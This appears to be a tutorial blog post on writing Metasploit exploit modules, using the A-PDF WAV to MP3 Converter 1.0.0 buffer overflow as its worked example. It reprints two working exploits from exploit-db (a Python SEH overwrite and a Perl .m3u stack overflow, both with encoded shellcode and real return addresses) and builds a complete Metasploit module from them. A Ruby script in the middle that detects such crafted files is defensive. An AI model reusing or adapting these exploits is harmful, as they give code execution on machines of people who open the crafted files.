
Before we go on to writing our own exploit, let's study the structure of exploit code.

##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Exploit Title',
            'Description'    => %q{
                    Exploit Description
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Author'
                ],
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'URL', 'http://www.somesite.com/' ],
                ],
            'Payload'        =>
                {
                    'Space'    => 6000,
                    'BadChars' => "\x00\x0a",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets'        =>
                [
                    # placeholder: the template leaves the return address blank, fill it in per target
                    [ 'Windows Universal', { 'Ret' => 0x00000000 } ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Date',
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('FILENAME', [ true, 'The file name.',  'filename.ext']),
            ], self.class)
    end

    def exploit
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        # 'sploit' is the buffer that the exploit body builds before writing the file
        file_create(sploit)
    end

end


So writing an exploit really just follows a standard template like the one above:

1. class Metasploit3 < Msf::Exploit::Remote
2. def initialize
3. def exploit

Pay attention to those three. Whenever we write an exploit we have to use these three parts,
so study them carefully and memorize them.
Later I'll show how to turn this structure into an actual exploit.


I'll explain them one by one.
First, look at how the class is written above:

class Metasploit3 < Msf::Exploit::Remote

    Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Remote::Seh

Those are the standard lines. Notice that Seh is the word that goes with the remote part,
so whenever we build an exploit for remote use, remember to always copy and paste those lines.

Then all that is left is to replace the fields noted below:


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Exploit Title',
            'Description'    => %q{
                    Exploit Description
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Author'
                ],
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'URL', 'http://www.somesite.com/' ],
                ],
            'Payload'        =>
                {
                    'Space'    => 6000,
                    'BadChars' => "\x00\x0a",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets'        =>
                [
                    # placeholder: the template leaves the return address blank, fill it in per target
                    [ 'Windows Universal', { 'Ret' => 0x00000000 } ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Date',
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('FILENAME', [ true, 'The file name.', 'filename.ext']),
            ], self.class)
    end
 
 
Then write the exploit method in the following format:

    def exploit
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(sploit)
    end

Let's try building one using the exploit here:

http://www.exploit-db.com/exploits/14681/

We'll try to turn this exploit into a Metasploit Framework module.

#!/usr/bin/env python

#################################################################################
#
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exploit By: Dr_IDE
# Tested On: XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

code = (
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");

buff = ("\x41" * 4132);
nops = ("\x90" * 12);
nseh = ("\xEB\x06\x90\x90");
retn = ("\x5C\x26\x47\x00");
junk = ("\x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);

try:
    f1 = open("Dr_IDEs.wav","w"); #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
except:
    print ("[-] Error, could not write the file.");
 
We're going to try to build an exploit from the bug above; it's practice, after all.

So we have 2 rules:
1. The Metasploit structure at the top, which we can modify.
2. The remote exploit bug.

Later we'll build an exploit for the bug above.

Now let's open the original bug on this site:

http://www.exploit-db.com/exploits/14676/

So there are 2 bugs in that application.
We use the bugs from http://www.exploit-db.com/ as our reference.



# Exploit Title: A-PDF WAV to MP3 Converter 1.0.0 (.m3u) Stack Buffer Overflow
# Author: d4rk-h4ck3r
# Date: 2010-07-17
# Software Link: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Greetz 2 : PASSEWORD , KAiSER-J , sec4...ever , tli7a , All Tun!Sian h4ck3rz
# Spacial thanks 2 : MadjiX ( el m3alem )
# Tested on: Windows XP SP3 Fr

my $jnk="\x41" x 4128 ;
my $eip = "\x63\x46\x92\x7C" ; # 0x7C924663 call esp kernel 32
my $nop = "\x90" x 20;
$shellcode = $shellcode
."\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(MYFILE,'>>d4rk.m3u');

print MYFILE $jnk.$eip.$nop.$shellcode;

close(MYFILE);
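Seen from the defender's side, the two files above share a shape that a legitimate .wav or .m3u never has: thousands of identical filler bytes starting at offset 0, then (in the SEH variant) the two-byte short jump of the nSEH record, and raw binary where a playlist should contain only text. The Ruby script below is an added example, not part of this post or of either exploit-db entry: it checks a file for those traits and reports findings. The threshold MIN_FILLER, the sample files it builds and PLACEHOLDER_ADDR (which stands in for a real address and is not one) are all constructed for the demo.

```ruby
# Heuristic checker for crafted media files of the shape discussed above.
# Added example, not from the blog post or from either exploit-db entry.

# Legitimate container headers never begin with a long run of a single byte;
# the threshold is a constructed value for this demo.
MIN_FILLER = 1024

# Length of the run of identical bytes starting at offset 0.
def leading_run_length(data)
  return 0 if data.empty?
  first = data.getbyte(0)
  n = 0
  n += 1 while n < data.bytesize && data.getbyte(n) == first
  n
end

# True when a short-jump-forward opcode (0xEB) sits right after the filler
# run: the nSEH "jump over the handler address" layout.
def short_jump_after_run?(data, min_run = MIN_FILLER)
  run = leading_run_length(data)
  return false if run < min_run || run >= data.bytesize
  data.getbyte(run) == 0xEB
end

# A real WAV file is a RIFF container whose form type is WAVE.
def looks_like_wav?(data)
  data.byteslice(0, 4) == "RIFF" && data.byteslice(8, 4) == "WAVE"
end

# A playlist is text: anything outside printable ASCII plus TAB/CR/LF is out of place.
def binary_bytes?(data)
  data.each_byte.any? { |b| !(b == 0x09 || b == 0x0a || b == 0x0d || b.between?(0x20, 0x7e)) }
end

# Returns an array of findings; an empty array means nothing suspicious was seen.
def assess(data, ext)
  data = data.b
  findings = []
  case ext
  when "wav" then findings << "no RIFF/WAVE header" unless looks_like_wav?(data)
  when "m3u" then findings << "non-text bytes in playlist" if binary_bytes?(data)
  end
  run = leading_run_length(data)
  if run >= MIN_FILLER
    findings << format("leading run of %d identical bytes (0x%02x)", run, data.getbyte(0))
  end
  if short_jump_after_run?(data)
    findings << "short-jump opcode immediately after filler (nSEH overwrite layout)"
  end
  findings
end

# Constructed samples. PLACEHOLDER_ADDR stands in for the address a crafted file
# would carry; it is not a real address.
PLACEHOLDER_ADDR = [0xEF, 0xBE, 0xAD, 0xDE].pack("C*")
NSEH_JUMP        = [0xEB, 0x06, 0x90, 0x90].pack("C*")
NOP              = [0x90].pack("C")
CRAFTED_WAV = ("A" * 4132).b + NSEH_JUMP + PLACEHOLDER_ADDR + (NOP * 12) + ("B" * 32).b
CRAFTED_M3U = ("A" * 4128).b + PLACEHOLDER_ADDR + (NOP * 20) + ("C" * 16).b
BENIGN_WAV  = "RIFF".b + [36].pack("V") + "WAVE".b + "fmt ".b + [16].pack("V") +
              [1, 1, 8000, 8000, 1, 8].pack("vvVVvv") + "data".b + [0].pack("V")
BENIGN_M3U  = "#EXTM3U\n#EXTINF:123,Example\nexample.mp3\n".b

if __FILE__ == $0
  samples = { "crafted.wav" => [CRAFTED_WAV, "wav"], "crafted.m3u" => [CRAFTED_M3U, "m3u"],
              "benign.wav"  => [BENIGN_WAV, "wav"],  "benign.m3u"  => [BENIGN_M3U, "m3u"] }
  samples.each do |name, (data, ext)|
    f = assess(data, ext)
    puts "#{name}: #{f.empty? ? 'clean' : f.join('; ')}"
  end
end
```

The run check only looks at offset 0, which is why a real WAV full of silence is not flagged: its first bytes are the RIFF header, not filler. Run it against a directory of media files on a quarantine host to triage which ones deserve a closer look.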



Remember:

From the explanation above we now have 2 keys:
1. Find the bug; our bug references are at:

http://www.exploit-db.com/exploits/14676/

http://www.exploit-db.com/exploits/14681/

2. We already have the writing structure above.

That's all there is to writing an exploit; let's put it into practice.

Let's edit our template structure:

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
            'Description'    => %q{
                    We can type a description of this exploit here
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'd4rk-h4ck3r', # first discoverer of this bug
                    'Dr_IDE',      # SEH exploit (the version that uses SEH)
                    'dookie'       # MSF module
                ],
            'Version'        => '$Revision: $',
            'References'     =>
                [
                    [ 'URL', 'http://www.exploit-db.com/exploits/14676/' ],
                    [ 'URL', 'http://www.exploit-db.com/exploits/14681/' ],
                ],

Up to here, building the exploit header is easy, isn't it?
Just carry over the Name, Description, License, Author, Version and References; all of it can be copied from the bug.

Let's continue filling in the structure above with the payload section:

            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'seh',
                    'DisablePayloadHandler' => 'true'
                },
            'Payload'        =>
                {
                    'Space'    => 600,
                    'BadChars' => "\x00\x0a",
                    'StackAdjustment' => -3500
                },
            'Platform' => 'win',
            'Targets'        =>
                [
                    [ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ], # p/p/r in wavtomp3.exe
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Aug 17 2010',
            'DefaultTarget'  => 0))
 


Then we declare the options:

        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
            ], self.class)
    end
 
 
Then we write the exploit method, using the 2 bugs above as reference:

    def exploit
        # filler up to the SEH record: Offset is 4132, the same length as buff in the Python exploit
        sploit = rand_text_alpha_upper(target['Offset'])
        # nSEH short jump plus the handler address (nseh and retn in the Python exploit)
        sploit << generate_seh_record(target.ret)
        # 12-byte NOP sled, as in the original
        sploit << make_nops(12)
        # the framework's encoded payload replaces the hard-coded calc shellcode
        sploit << payload.encoded

        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(sploit)
    end

Finished.
